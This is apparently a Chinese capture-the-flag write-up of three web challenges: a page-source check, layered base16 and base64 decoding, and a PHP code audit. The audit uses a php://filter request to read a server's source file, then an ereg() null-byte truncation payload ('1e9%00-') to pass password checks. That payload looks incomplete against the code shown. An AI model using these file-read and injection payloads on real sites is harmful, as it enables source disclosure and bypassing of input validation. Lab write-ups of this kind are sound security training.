WEB

签到题

打开题目

image.png

0改成1

image.png
查看源码，有flag

测试你与flag的缘分

题目

image.png

打开flag.txt ，一段js密码，解密是一串base16，再解是qp，最后，假的密码
回到题目，查看源码，发现一段base16

image.png

解密，解出来是base64，解两次，flag

简单的代码审计

打开题目一片空白,查看源码

image.png image.png

题目是代码审计，php伪协议，

file=php://filter/read=convert.base64-encode/resource=once.php

image.png

出来一串base64

PGh0bWw+PGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1HQksiPg0KCTx0aXRsZT5PbmNlIE1vcmU8L3RpdGxlPg0KPC9oZWFkPg0KPGJvZHk+PGJyPg0KPGNlbnRlcj4NCjxwPllvdSBwYXNzd29yZCBtdXN0IGJlIGFscGhhbnVtZXJpYzwvcD48YnI+DQo8Zm9ybSBtZXRob2Q9ImdldCI+DQoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBhc3N3b3JkIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPjxicj48YnI+DQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNoZWNrIj4NCjwvZm9ybT4NCjxocj48YnI+DQo8L2JvZHk+PC9odG1sPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsgDQppbmNsdWRlX29uY2UoJy4vZmxhZy9mbGFnMC5waHAnKTsNCmlmIChpc3NldCAoJF9HRVRbJ3Bhc3N3b3JkJ10pKSB7DQoJaWYgKGVyZWcgKCJeW2EtekEtWjAtOV0rJCIsICRfR0VUWydwYXNzd29yZCddKSA9PT0gRkFMU0UpDQoJew0KCQllY2hvICc8cD5Zb3UgcGFzc3dvcmQgbXVzdCBiZSBhbHBoYW51bWVyaWM8L3A+JzsNCgl9DQoJZWxzZSBpZiAoc3RybGVuKCRfR0VUWydwYXNzd29yZCddKSA8IDggJiYgJF9HRVRbJ3Bhc3N3b3JkJ10gPiA5OTk5OTk5OTkpDQoJew0KCQlpZiAoc3RycG9zICgkX0dFVFsncGFzc3dvcmQnXSwgJyotKicpICE9PSBGQUxTRSkNCgkJew0KCQkJZGllKCdGbGFnOiAnIC4gJGZsYWcpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJZWNobygnPHA+Ki0qIGhhdmUgbm90IGJlZW4gZm91bmQ8L3A+Jyk7DQoJCX0NCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAnPHA+SW52YWxpZCBwYXNzd29yZDwvcD4nOw0KCX0NCn0NCj8+DQo=

base 64解密出来

<html><head>
<meta http-equiv="content-type" content="text/html; charset=GBK">
    <title>Once More</title>
</head>
<body><br>
<center>
<p>You password must be alphanumeric</p><br>
<form method="get">
    <input type="text" name="password" placeholder="Password"><br><br>
    <input type="submit" value="Check">
</form>
<hr><br>
</body></html>
<?php
error_reporting(0); 
include_once('./flag/flag0.php');
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 999999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>

ereg():输入的password必须是大小写字母和数字
strlen（）：输入值必须大于999999999并且长度小于8
strops():输入的值中必须含有 * - *
利用ereg函数的截断漏洞可以构造playload:1e9%00-
得到flag

image.png